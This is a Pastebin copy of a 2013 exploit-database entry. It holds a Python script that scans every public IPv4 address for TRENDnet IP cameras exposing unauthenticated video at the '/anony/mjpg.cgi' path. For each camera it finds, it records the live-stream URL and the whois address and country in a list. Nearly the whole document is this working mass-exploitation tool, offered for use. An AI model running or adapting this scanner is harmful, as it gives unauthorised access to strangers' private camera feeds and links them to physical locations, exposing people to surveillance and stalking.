Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title: TRENDNet IP Cam Authentication Bypass Vulnerability
- Date add: 2013-04-12
- Category: remote exploits
- Verified: Verified
- Platform: hardware
- --------------------------------------------------------------------
- # Exploit Title: TRENDNet IP Cam Magic URL Searcher.
- # Date: [10/04/2013]
- # Author: [SnakingMax]
- # Website: http://snakingmax.blogspot.com/
- # Category: [Remote Exploit]
- # Vulnerability description:
- # Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^
- #
- # Software Description:
- # This software scans Internet to find TRENDNet IP vulnerable cams.
- from struct import *
- from socket import *
- from http.client import HTTPConnection
- import urllib.request
- import subprocess
- def isPublicIP(ip):
- #This method responses True if is a public IP or False in otherwise.
- f = unpack('!I',inet_pton(AF_INET,ip))[0]
- private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"])
- for net in private:
- mask = unpack('!I',inet_aton(net[1]))[0]
- p = unpack('!I',inet_aton(net[0]))[0]
- if (f & mask) == p:
- return False
- return True
- def isPublicWebcam(ip):
- #This method responses True if the IP is a webcam or False in otherwise.
- try:
- conn = HTTPConnection(ip, 80, timeout=5)
- conn.request('GET', "/anony/mjpg.cgi")
- response = conn.getresponse()
- if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
- response.close()
- conn.close()
- return True
- response.close()
- conn.close()
- return False
- except Exception as E:
- return False
- response.close()
- conn.close()
- def addThisCamToMyList(camIP):
- #This method save data into a file called CamList.txt
- camlist = open("CamList.txt", "at")
- camlist.write("------------------------WEBCAM------------------------\n")
- #Saving URL.
- camlist.write(" URL: http://"+camIP+"/anony/mjpg.cgi\n")
- #Getting and writting whois Information about the cam ip.
- whoisInfo = subprocess.check_output(["whois", camIP])
- whoisList = str(whoisInfo).split("\\n")
- #Getting and writting address information.
- for i in whoisList:
- if (i.count("address")>0):
- camlist.write(" ADDRESS:\n")
- camlist.write(i[8:]+"\n")
- #Getting and writting country Information.
- for i in whoisList:
- if (i.count("country")>0):
- camlist.write(" COUNTRY:\n")
- print(i[:8]+"\n")
- break
- camlist.write("------------------------------------------------------\n")
- camlist.close()
- if ( (__name__)=="__main__" ):
- #Generating IP address.
- for a in reversed(range(256)):
- for b in reversed(range(256)):
- for c in reversed(range(256)):
- for d in range(1,255):
- generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
- #Check if generated IP is public.
- if(isPublicIP(generatedIP)):
- print("Testing IP: "+generatedIP)
- #Check if the IP is a webcam.
- if (isPublicWebcam(generatedIP)):
- print(generatedIP + " is a webcam ;-)")
- #Saving data about the camera into a file.
- addThisCamToMyList(generatedIP)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement